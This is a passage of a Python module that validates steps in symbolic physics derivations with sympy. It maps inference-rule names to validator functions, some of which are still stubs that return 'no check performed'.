        "multiply RHS by unity": multiply_RHS_by_unity,
        "swap LHS with RHS": swap_LHS_with_RHS,
        "take curl of both sides": take_curl_of_both_sides,
        "apply divergence": apply_divergence,
        "indefinite integral over": indefinite_integral_over,
        "indefinite integration": indefinite_integration,
        "indefinite integrate LHS over": indefinite_integrate_LHS_over,
        "indefinite integrate RHS over": indefinite_integrate_RHS_over,
        "integrate over from to": integrate_over_from_to,
        "partially differentiate with respect to": partially_differentiate_with_respect_to,
        "X cross both sides by": X_cross_both_sides_by,
        "both sides cross X": both_sides_cross_X,
        "X dot both sides": X_dot_both_sides,
        "both sides dot X": both_sides_dot_X,
        "make expr power": make_expr_power,
        "select real parts": select_real_parts,
        "select imag parts": select_imag_parts,
        "sum exponents LHS": sum_exponents_LHS,
        "sum exponents RHS": sum_exponents_RHS,
        "add expr 1 to expr 2": add_expr_1_to_expr_2,
        "substitute RHS of expr 1 into expr 2": substitute_RHS_of_expr_1_into_expr_2,
        "substitute LHS of expr 1 into expr 2": substitute_LHS_of_expr_1_into_expr_2,
        "mult expr 1 by expr 2": mult_expr_1_by_expr_2,
        "LHS of expr 1 equals LHS of expr 2": LHS_of_expr_1_eq_LHS_of_expr_2,
        "RHS of expr 1 equals RHS of expr 2": RHS_of_expr_1_eq_RHS_of_expr_2,
        "raise both sides to power": raise_both_sides_to_power,
        "claim expr 1 equals expr 2": claim_expr_1_equals_expr_2,
        "claim LHS equals RHS": claim_LHS_equals_RHS,
        "expand integrand": expand_integrand,
        "function is even": function_is_even,
        "function is odd": function_is_odd,
        "conjugate function X": conjugate_function_X,
        "conjugate both sides": conjugate_both_sides,
        "conjugate transpose both sides": conjugate_transpose_both_sides,
        "distribute conjugate transpose to factors": distribute_conjugate_transpose_to_factors,
        "distribute conjugate to factors": distribute_conjugate_to_factors,
        "expand magnitude to conjugate": expand_magnitude_to_conjugate,
        "replace scalar with vector": replace_scalar_with_vector,
        "simplify": simplify,
        "factor out X": factor_out_x,
        "factor out X from LHS": factor_out_x_from_lhs,
        "factor out X from RHS": factor_out_x_from_rhs,
        "differentiate with respect to": differentiate_with_respect_to,
        "apply function to both sides of expression": apply_function_to_both_sides_of_expression,
        "substitute LHS of two expressions into expr": substitute_LHS_of_two_expressions_into_expr,
        "substitute LHS of three expressions into expr": substitute_LHS_of_three_expressions_into_expr,
        "substitute LHS of four expressions into expr": substitute_LHS_of_four_expressions_into_expr,
        "substitute LHS of five expressions into expr": substitute_LHS_of_five_expressions_into_expr,
        "substitute LHS of six expressions into expr": substitute_LHS_of_six_expressions_into_expr,
        "expr 1 is equivalent to expr 2 under the condition": expr_is_equivalent_to_expr_under_the_condition,
        "change two variables in expr": change_two_variables_in_expr,
        "change three variables in expr": change_three_variables_in_expr,
        "change four variables in expr": change_four_variables_in_expr,
        "change five variables in expr": change_five_variables_in_expr,
        "change six variables in expr": change_six_variables_in_expr,
        "square root both sides": square_root_both_sides,
        "divide expr 1 by expr 2": divide_expr_by_expr,
        "separate two vector components": separate_two_vector_components,
        "separate three vector components": separate_three_vector_components,
        "separate vector into two trigonometric ratios": separate_vector_into_two_trigonometric_ratios,
        "maximum of expr": maximum_of_expr,
        "evaluate definite integral": evaluate_definite_integral,
        "expr 1 is true under condition expr 2": expr_is_true_under_condition_expr,
        "declare variable replacement": declare_variable_replacement,
        "integrate": integrate,
        "replace constant with value": replace_constant_with_value,
        "expand LHS": expand_LHS,
        "expand RHS": expand_RHS,
        "multiply expr 1 by expr 2": multiply_expr_by_expr,
        "apply operator to bra": apply_operator_to_bra,
        "apply operator to ket": apply_operator_to_ket,
        "drop non-dominant term": drop_nondominant_term,
        "apply gradient to scalar function": apply_gradient_to_scalar_function,
        "subtract expr 1 from expr 2": subtract_expr_1_from_expr_2,
    }
    inf_rule = step_dict["inf rule"]
    validator = validators.get(inf_rule)
    if validator is None:
        logger.error("unexpected inf rule:" + inf_rule)
        raise Exception("Unexpected inf rule: " + inf_rule)
    logger.info("[trace end " + trace_id + "]")
    return validator(latex_dict)
def add_X_to_both_sides(latex_dict: dict) -> str:
    """
    Check that the feed expression was added to both sides of the input.

    https://docs.sympy.org/latest/gotchas.html#double-equals-signs
    https://stackoverflow.com/questions/37112738/sympy-comparing-expressions

    Given a = b
    add c to both sides
    get a + c = b + c

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')}]
    >>> latex_dict['feed'] = [parse_latex('c')]
    >>> latex_dict['output'] = [{'LHS': parse_latex('a + c'), 'RHS': parse_latex('b + c')}]
    >>> add_X_to_both_sides(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    # each diff simplifies to 0 iff the output side equals input side + feed
    d1 = sympy.simplify(
        sympy.Add(latex_dict["input"][0]["LHS"], latex_dict["feed"][0])
        - latex_dict["output"][0]["LHS"]
    )
    d2 = sympy.simplify(
        sympy.Add(latex_dict["input"][0]["RHS"], latex_dict["feed"][0])
        - latex_dict["output"][0]["RHS"]
    )
    if (d1 == 0) and (d2 == 0):
        logger.info("[trace end " + trace_id + "]")
        return "valid"
    else:
        logger.info("[trace end " + trace_id + "]")
        return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def subtract_X_from_both_sides(latex_dict: dict) -> str:
    """
    Check that the feed expression was subtracted from both sides.

    https://docs.sympy.org/latest/tutorial/manipulation.html
    Rather than have "add X to both sides" and "subtract X from both sides"
    as separate inference rules, we could write "subtract X from both sides"
    to use "add X to both sides"

    Given a = b
    subtract c
    get a - c = b - c

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')}]
    >>> latex_dict['feed'] = [parse_latex('c')]
    >>> latex_dict['output'] = [{'LHS': parse_latex('a - c'), 'RHS': parse_latex('b - c')}]
    >>> subtract_X_from_both_sides(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    # subtraction is expressed as adding (-1 * feed)
    d1 = sympy.simplify(
        sympy.Add(latex_dict["input"][0]["LHS"], sympy.Mul(-1, latex_dict["feed"][0]))
        - latex_dict["output"][0]["LHS"]
    )
    d2 = sympy.simplify(
        sympy.Add(latex_dict["input"][0]["RHS"], sympy.Mul(-1, latex_dict["feed"][0]))
        - latex_dict["output"][0]["RHS"]
    )
    if (d1 == 0) and (d2 == 0):
        logger.info("[trace end " + trace_id + "]")
        return "valid"
    else:
        logger.info("[trace end " + trace_id + "]")
        return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def multiply_both_sides_by(latex_dict: dict) -> str:
    """
    Check that both sides of the input were multiplied by the feed.

    see also divide_both_sides_by
    x*y = Mul(x,y)

    given 'a + b = c'
    multiply both sides by d
    to get '(a + b)*d = c*d'

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a + b'), 'RHS': parse_latex('c')}]
    >>> latex_dict['feed'] = [parse_latex('d')]
    >>> latex_dict['output'] = [{'LHS': parse_latex('(a + b)*d'), 'RHS': parse_latex('c*d')}]
    >>> multiply_both_sides_by(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    d1 = sympy.simplify(
        sympy.Mul(latex_dict["input"][0]["LHS"], latex_dict["feed"][0])
        - latex_dict["output"][0]["LHS"]
    )
    d2 = sympy.simplify(
        sympy.Mul(latex_dict["input"][0]["RHS"], latex_dict["feed"][0])
        - latex_dict["output"][0]["RHS"]
    )
    if (d1 == 0) and (d2 == 0):
        logger.info("[trace end " + trace_id + "]")
        return "valid"
    else:
        logger.info("[trace end " + trace_id + "]")
        return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def divide_both_sides_by(latex_dict: dict) -> str:
    """
    Check that both sides of the input were divided by the feed.

    see also multiply_both_sides_by
    https://docs.sympy.org/latest/tutorial/manipulation.html
    x/y = Mul(x, Pow(y, -1))

    given 'a + b = c'
    divide both sides by d
    to get '(a + b)/d = c/d'

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a + b'), 'RHS': parse_latex('c')}]
    >>> latex_dict['feed'] = [parse_latex('d')]
    >>> latex_dict['output'] = [{'LHS': parse_latex('(a + b)/d'), 'RHS': parse_latex('c/d')}]
    >>> divide_both_sides_by(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    # division is multiplication by feed**-1
    d1 = sympy.simplify(
        sympy.Mul(latex_dict["input"][0]["LHS"], sympy.Pow(latex_dict["feed"][0], -1))
        - latex_dict["output"][0]["LHS"]
    )
    d2 = sympy.simplify(
        sympy.Mul(latex_dict["input"][0]["RHS"], sympy.Pow(latex_dict["feed"][0], -1))
        - latex_dict["output"][0]["RHS"]
    )
    if (d1 == 0) and (d2 == 0):
        logger.info("[trace end " + trace_id + "]")
        return "valid"
    else:
        logger.info("[trace end " + trace_id + "]")
        return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def change_variable_X_to_Y(latex_dict: dict) -> str:
    """
    Check that variable feed[0] was substituted by feed[1] on both sides.

    given 'a + b = c',
    substitute b --> d
    to get 'a + d = c'

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a + b'), 'RHS': parse_latex('c')}]
    >>> latex_dict['feed'] = [parse_latex('b'), parse_latex('d')]
    >>> latex_dict['output'] = [{'LHS': parse_latex('a + d'), 'RHS': parse_latex('c')}]
    >>> change_variable_X_to_Y(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    # logger.debug('input: ' + str(latex_dict['input']))
    # logger.debug('feed: ' + str(latex_dict['feed']))
    # logger.debug('output: ' + str(latex_dict['output']))
    d1 = sympy.simplify(
        latex_dict["input"][0]["LHS"].subs(latex_dict["feed"][0], latex_dict["feed"][1])
        - latex_dict["output"][0]["LHS"]
    )
    d2 = sympy.simplify(
        latex_dict["input"][0]["RHS"].subs(latex_dict["feed"][0], latex_dict["feed"][1])
        - latex_dict["output"][0]["RHS"]
    )
    if (d1 == 0) and (d2 == 0):
        logger.info("[trace end " + trace_id + "]")
        return "valid"
    else:
        logger.info("[trace end " + trace_id + "]")
        return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def multiply_LHS_by_unity(latex_dict: dict) -> str:
    """
    Check that the LHS was multiplied by a feed that simplifies to 1.

    see also multiply_RHS_by_unity

    Given a = b
    mult LHS by (c/c)
    get (a*c)/c = b

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')}]
    >>> latex_dict['feed'] = [parse_latex('c/c')]
    >>> latex_dict['output'] = [{'LHS': parse_latex('(a c)/c'), 'RHS': parse_latex('b')}]
    >>> multiply_LHS_by_unity(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    # d1: the feed must be unity; d2: LHS transformed; d3: RHS unchanged
    d1 = sympy.simplify(latex_dict["feed"][0] - 1)
    d2 = sympy.simplify(
        sympy.Mul(latex_dict["input"][0]["LHS"], latex_dict["feed"][0])
        - latex_dict["output"][0]["LHS"]
    )
    d3 = sympy.simplify(latex_dict["input"][0]["RHS"] - latex_dict["output"][0]["RHS"])
    if (d1 == 0) and (d2 == 0) and (d3 == 0):
        logger.info("[trace end " + trace_id + "]")
        return "valid"
    else:
        logger.info("[trace end " + trace_id + "]")
        return (
            "feed diff is "
            + str(d1)
            + "\n"
            + "LHS diff is "
            + str(d2)
            + "\n"
            + "RHS diff is "
            + str(d3)
        )
def multiply_RHS_by_unity(latex_dict: dict) -> str:
    """
    Check that the RHS was multiplied by a feed that simplifies to 1.

    see also multiply_LHS_by_unity

    Given a = b
    mult by (c/c)
    get a = (b*c)/c

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')}]
    >>> latex_dict['feed'] = [parse_latex('c/c')]
    >>> latex_dict['output'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('(b c)/c')}]
    >>> multiply_RHS_by_unity(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    # d1: the feed must be unity; d2: RHS transformed; d3: LHS unchanged
    d1 = sympy.simplify(latex_dict["feed"][0] - 1)
    d2 = sympy.simplify(
        sympy.Mul(latex_dict["input"][0]["RHS"], latex_dict["feed"][0])
        - latex_dict["output"][0]["RHS"]
    )
    d3 = sympy.simplify(latex_dict["input"][0]["LHS"] - latex_dict["output"][0]["LHS"])
    if (d1 == 0) and (d2 == 0) and (d3 == 0):
        logger.info("[trace end " + trace_id + "]")
        return "valid"
    else:
        logger.info("[trace end " + trace_id + "]")
        return (
            "feed diff is "
            + str(d1)
            + "\n"
            + "LHS diff is "
            + str(d3)
            + "\n"
            + "RHS diff is "
            + str(d2)
        )
def add_zero_to_LHS(latex_dict: dict) -> str:
    """
    Check that a feed equal to zero was added to the LHS only.

    see also add_zero_to_RHS
    ((feed==0) and (out_lhs0 == (in_lhs0+zero)) and (out_rhs0 == in_rhs0))

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')}]
    >>> latex_dict['feed'] = [parse_latex('0')]
    >>> latex_dict['output'] = [{'LHS': parse_latex('a + 0'), 'RHS': parse_latex('b')}]
    >>> add_zero_to_LHS(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    # d1: the feed must be zero; d2: LHS transformed; d3: RHS unchanged
    d1 = sympy.simplify(latex_dict["feed"][0])
    d2 = sympy.simplify(
        sympy.Add(latex_dict["input"][0]["LHS"], latex_dict["feed"][0])
        - latex_dict["output"][0]["LHS"]
    )
    d3 = sympy.simplify(latex_dict["input"][0]["RHS"] - latex_dict["output"][0]["RHS"])
    if (d1 == 0) and (d2 == 0) and (d3 == 0):
        logger.info("[trace end " + trace_id + "]")
        return "valid"
    else:
        logger.info("[trace end " + trace_id + "]")
        return (
            "feed diff is "
            + str(d1)
            + "\n"
            + "LHS diff is "
            + str(d2)
            + "\n"
            + "RHS diff is "
            + str(d3)
        )
def add_zero_to_RHS(latex_dict: dict) -> str:
    """
    Check that a feed equal to zero was added to the RHS only.

    see also add_zero_to_LHS
    ((feed==0) and (out_rhs0 == (in_rhs0+zero)) and (out_lhs0 == in_lhs0))

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')}]
    >>> latex_dict['feed'] = [parse_latex('0')]
    >>> latex_dict['output'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b + 0')}]
    >>> add_zero_to_RHS(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    # d1: the feed must be zero; d2: RHS transformed; d3: LHS unchanged
    d1 = sympy.simplify(latex_dict["feed"][0])
    d2 = sympy.simplify(
        sympy.Add(latex_dict["input"][0]["RHS"], latex_dict["feed"][0])
        - latex_dict["output"][0]["RHS"]
    )
    d3 = sympy.simplify(latex_dict["input"][0]["LHS"] - latex_dict["output"][0]["LHS"])
    if (d1 == 0) and (d2 == 0) and (d3 == 0):
        logger.info("[trace end " + trace_id + "]")
        return "valid"
    else:
        logger.info("[trace end " + trace_id + "]")
        return (
            "feed diff is "
            + str(d1)
            + "\n"
            + "LHS diff is "
            + str(d3)
            + "\n"
            + "RHS diff is "
            + str(d2)
        )
def take_curl_of_both_sides(latex_dict: dict) -> str:
    r"""
    Apply the curl operator to both sides:
    ((out_lhs0 == (\nabla \times in_lhs0)) and (out_rhs0 == \nabla \times in_rhs0))

    Validation is not implemented for this rule.

    >>> take_curl_of_both_sides({})
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def apply_divergence(latex_dict: dict) -> str:
    r"""
    Apply the divergence operator, $\vec{\nabla} \cdot$, to both sides.

    Validation is not implemented for this rule.

    >>> apply_divergence({})
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def indefinite_integral_over(latex_dict: dict) -> str:
    r"""
    Integrate both sides with respect to the feed:
    ((out_lhs0 == (\int in_lhs0 feed0)) and (out_rhs0 == \int in_rhs0 feed0))

    Given a = b
    over dt
    get \int a dt = \int b dt

    Validation is not implemented for this rule.

    >>> indefinite_integral_over({})
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def indefinite_integration(latex_dict: dict) -> str:
    r"""
    Apply indefinite integration to both sides:
    ((out_lhs0 == (\int in_lhs0 )) and (out_rhs0 == \int in_rhs0 ))

    Validation is not implemented for this rule.

    >>> indefinite_integration({})
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def indefinite_integrate_LHS_over(latex_dict: dict) -> str:
    r"""
    Integrate only the LHS with respect to the feed:
    ((out_lhs0 == (\int in_lhs0 feed0)) and (out_rhs0 == in_rhs0))

    Validation is not implemented for this rule.

    >>> indefinite_integrate_LHS_over({})
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def indefinite_integrate_RHS_over(latex_dict: dict) -> str:
    r"""
    Integrate only the RHS with respect to the feed:
    ((out_lhs0 == in_lhs0) and (out_rhs0 == \int in_rhs0 feed0))

    Validation is not implemented for this rule.

    >>> indefinite_integrate_RHS_over({})
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def integrate_over_from_to(latex_dict: dict) -> str:
    r"""
    Apply a definite integral to both sides:
    ((out_lhs0 == (\int_{feed1}^{feed2} in_lhs0 feed0)) and (out_rhs0 == \int_{feed1}^{feed2} in_rhs0 feed0))

    Validation is not implemented for this rule.

    >>> integrate_over_from_to({})
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def partially_differentiate_with_respect_to(latex_dict: dict) -> str:
    r"""
    Apply \frac{\partial}{\partial #1} to both sides.

    Validation is not implemented for this rule.

    >>> partially_differentiate_with_respect_to({})
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def X_cross_both_sides_by(latex_dict: dict) -> str:
    """
    Cross the feed with both sides (feed on the left):
    arg x LHS = arg x RHS

    Validation is not implemented for this rule.

    >>> X_cross_both_sides_by({})
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def both_sides_cross_X(latex_dict: dict) -> str:
    """
    Cross both sides with the feed (feed on the right):
    LHS x arg = RHS x arg

    Validation is not implemented for this rule.

    >>> both_sides_cross_X({})
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def X_dot_both_sides(latex_dict: dict) -> str:
    r"""
    Dot the feed with both sides (feed on the left):
    arg \cdot LHS = arg \cdot RHS

    Validation is not implemented for this rule.

    >>> X_dot_both_sides({})
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def both_sides_dot_X(latex_dict: dict) -> str:
    r"""
    Dot both sides with the feed (feed on the right):
    LHS \cdot arg = RHS \cdot arg

    Validation is not implemented for this rule.

    >>> both_sides_dot_X({})
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def make_expr_power(latex_dict: dict) -> str:
    """
    Check that both sides were used as exponents of the feed base:
    ((out_lhs0 == (feed0)**(in_lhs0)) and (out_rhs0 == (feed0)**(in_rhs0)))

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')}]
    >>> latex_dict['feed'] = [parse_latex('x')]
    >>> latex_dict['output'] = [{'LHS': parse_latex('x^a'), 'RHS': parse_latex('x^b')}]
    >>> make_expr_power(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    d1 = sympy.simplify(
        latex_dict["output"][0]["LHS"]
        - sympy.Pow(latex_dict["feed"][0], latex_dict["input"][0]["LHS"])
    )
    d2 = sympy.simplify(
        latex_dict["output"][0]["RHS"]
        - sympy.Pow(latex_dict["feed"][0], latex_dict["input"][0]["RHS"])
    )
    if (d1 == 0) and (d2 == 0):
        logger.info("[trace end " + trace_id + "]")
        return "valid"
    else:
        logger.info("[trace end " + trace_id + "]")
        return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def select_real_parts(latex_dict: dict) -> str:
    """
    Keep only the real part of both sides; e.g. sympy.re(2+3*sympy.I)==2

    Validation is not implemented for this rule.

    >>> select_real_parts({})
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def select_imag_parts(latex_dict: dict) -> str:
    """
    Keep only the imaginary part of both sides; e.g. sympy.im(2+3*sympy.I)==3

    Validation is not implemented for this rule.

    >>> select_imag_parts({})
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def swap_LHS_with_RHS(latex_dict: dict) -> str:
    """
    Validate swapping the two sides of an expression:
    ((in_lhs0 == out_rhs0) and (in_rhs0 == out_lhs0))

    given 'a + b = c'
    get 'c = a + b'

    Returns 'valid' when both cross-side differences simplify to zero;
    otherwise a message showing the nonzero differences.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a + b'), 'RHS': parse_latex('c')}]
    >>> latex_dict['output'] = [{'LHS': parse_latex('c'), 'RHS': parse_latex('a + b')}]
    >>> swap_LHS_with_RHS(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    d1 = sympy.simplify(latex_dict["input"][0]["LHS"] - latex_dict["output"][0]["RHS"])
    d2 = sympy.simplify(latex_dict["input"][0]["RHS"] - latex_dict["output"][0]["LHS"])
    logger.info("[trace end " + trace_id + "]")
    if (d1 == 0) and (d2 == 0):
        return "valid"
    # bug fix: the RHS diff previously printed str(d1) instead of str(d2)
    return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def sum_exponents_LHS(latex_dict: dict) -> str:
    """
    Combine exponents on the LHS; the RHS must be unchanged:
    see also sum_exponents_RHS
    (in_rhs0 == out_rhs0)

    No verdict is produced yet: the computed differences are discarded and
    'no check performed' is always returned.
    NOTE(review): d2 compares input RHS against output LHS, which disagrees
    with the (in_rhs0 == out_rhs0) predicate above — confirm intent before
    wiring the result into a verdict.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> sum_exponents_LHS(latex_dict)
    'no check performed'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    d1 = 0  # not sure what this should be yet
    d2 = sympy.simplify(latex_dict["input"][0]["RHS"] - latex_dict["output"][0]["LHS"])
    logger.info("[trace end " + trace_id + "]")
    return "no check performed"
def sum_exponents_RHS(latex_dict: dict) -> str:
    """
    Combine exponents on the RHS; the LHS must be unchanged:
    see also sum_exponents_LHS
    (in_lhs0 == out_lhs0)

    No verdict is produced yet: the computed differences are discarded and
    'no check performed' is always returned.
    NOTE(review): d1 compares input LHS against output RHS, which disagrees
    with the (in_lhs0 == out_lhs0) predicate above — confirm intent before
    wiring the result into a verdict.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> sum_exponents_RHS(latex_dict)
    'no check performed'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    d1 = sympy.simplify(latex_dict["input"][0]["LHS"] - latex_dict["output"][0]["RHS"])
    d2 = 0  # not sure what this should be yet
    logger.info("[trace end " + trace_id + "]")
    return "no check performed"
def add_expr_1_to_expr_2(latex_dict: dict) -> str:
    """
    Validate adding two expressions side-by-side.
    assumes result form LHS(X)+LHS(Y)=RHS(X)+RHS(Y)
    (((in_lhs0+in_lhs1)==out_lhs0) and ((in_rhs0+in_rhs1)==out_rhs0))

    Returns 'valid' when both differences simplify to zero; otherwise a
    message showing the nonzero differences.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> add_expr_1_to_expr_2(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    d1 = sympy.simplify(
        sympy.Add(latex_dict["input"][0]["LHS"], latex_dict["input"][1]["LHS"])
        - latex_dict["output"][0]["LHS"]
    )
    # bug fix: d2 previously recomputed the LHS difference, so the RHS
    # of the result was never actually checked
    d2 = sympy.simplify(
        sympy.Add(latex_dict["input"][0]["RHS"], latex_dict["input"][1]["RHS"])
        - latex_dict["output"][0]["RHS"]
    )
    logger.info("[trace end " + trace_id + "]")
    if (d1 == 0) and (d2 == 0):
        return "valid"
    # bug fix: the RHS diff previously printed str(d1) instead of str(d2)
    return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def substitute_RHS_of_expr_1_into_expr_2(latex_dict: dict) -> str:
    """
    Substitute the RHS of the first expression into the second expression.

    Given a = b
    and c = b*d
    get c = a*d

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')},
                               {'LHS': parse_latex('c'), 'RHS': parse_latex('b d')}]
    >>> latex_dict['output'] = [{'LHS': parse_latex('c'), 'RHS': parse_latex('a d')}]
    >>> substitute_RHS_of_expr_1_into_expr_2(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def substitute_LHS_of_expr_1_into_expr_2(latex_dict: dict) -> str:
    """
    Substitute the LHS of the first expression into the second expression.

    Given a = b
    and c = a*d
    get c = b*d

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')},
                               {'LHS': parse_latex('c'), 'RHS': parse_latex('a d')}]
    >>> latex_dict['output'] = [{'LHS': parse_latex('c'), 'RHS': parse_latex('b d')}]
    >>> substitute_LHS_of_expr_1_into_expr_2(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def mult_expr_1_by_expr_2(latex_dict: dict) -> str:
    """
    Validate multiplying two expressions side-by-side:
    ((in_lhs0*in_lhs1 == out_lhs0) and (in_rhs0*in_rhs1 == out_rhs0))

    Returns 'valid' when both differences simplify to zero; otherwise a
    message showing the nonzero differences.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> mult_expr_1_by_expr_2(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    d1 = sympy.simplify(
        sympy.Mul(latex_dict["input"][0]["LHS"], latex_dict["input"][1]["LHS"])
        - latex_dict["output"][0]["LHS"]
    )
    # bug fix: d2 previously recomputed the LHS difference, so the RHS
    # of the result was never actually checked
    d2 = sympy.simplify(
        sympy.Mul(latex_dict["input"][0]["RHS"], latex_dict["input"][1]["RHS"])
        - latex_dict["output"][0]["RHS"]
    )
    logger.info("[trace end " + trace_id + "]")
    if (d1 == 0) and (d2 == 0):
        return "valid"
    # bug fix: the RHS diff previously printed str(d1) instead of str(d2)
    return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def LHS_of_expr_1_eq_LHS_of_expr_2(latex_dict: dict) -> str:
    """
    Validate equating the RHS of two expressions whose LHS match:
    ((in_lhs0 == in_lhs1) and (out_lhs0 == in_rhs0) and (out_rhs0 == in_rhs1))

    Returns 'valid' when all three differences simplify to zero; otherwise
    a message showing each difference.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> LHS_of_expr_1_eq_LHS_of_expr_2(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    first, second = latex_dict["input"][0], latex_dict["input"][1]
    result = latex_dict["output"][0]
    diff_inputs = sympy.simplify(first["LHS"] - second["LHS"])
    diff_lhs = sympy.simplify(result["LHS"] - first["RHS"])
    diff_rhs = sympy.simplify(result["RHS"] - second["RHS"])
    logger.info("[trace end " + trace_id + "]")
    if diff_inputs == 0 and diff_lhs == 0 and diff_rhs == 0:
        return "valid"
    return f"input diff is {diff_inputs}\n diff is {diff_lhs}\n diff is {diff_rhs}"
def RHS_of_expr_1_eq_RHS_of_expr_2(latex_dict: dict) -> str:
    """
    Validate equating the LHS of two expressions whose RHS match:
    ((in_rhs0 == in_rhs1) and (out_lhs0 == in_lhs0) and (out_rhs0 == in_lhs1))

    Returns 'valid' when all three differences simplify to zero; otherwise
    a message showing each difference.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
